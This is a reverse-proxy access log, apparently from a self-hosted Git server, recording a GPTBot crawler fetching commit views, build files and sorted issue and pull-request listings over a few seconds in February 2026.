"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:19:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=source" [Client 74.7.227.38] [Length 15194] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:19:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:19:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=source" [Client 74.7.227.38] [Length 15194] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:19:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:19:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:19:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:19:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=source" [Client 74.7.227.38] [Length 15194] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:19:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=source" [Client 74.7.227.38] [Length 15196] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:19:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=source" [Client 74.7.227.38] [Length 15193] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:19:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33925] [Gzip 10.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:19:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:17:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:17:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" +[17/Feb/2026:19:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 3.05] [Sent-to 192.168.0.250] 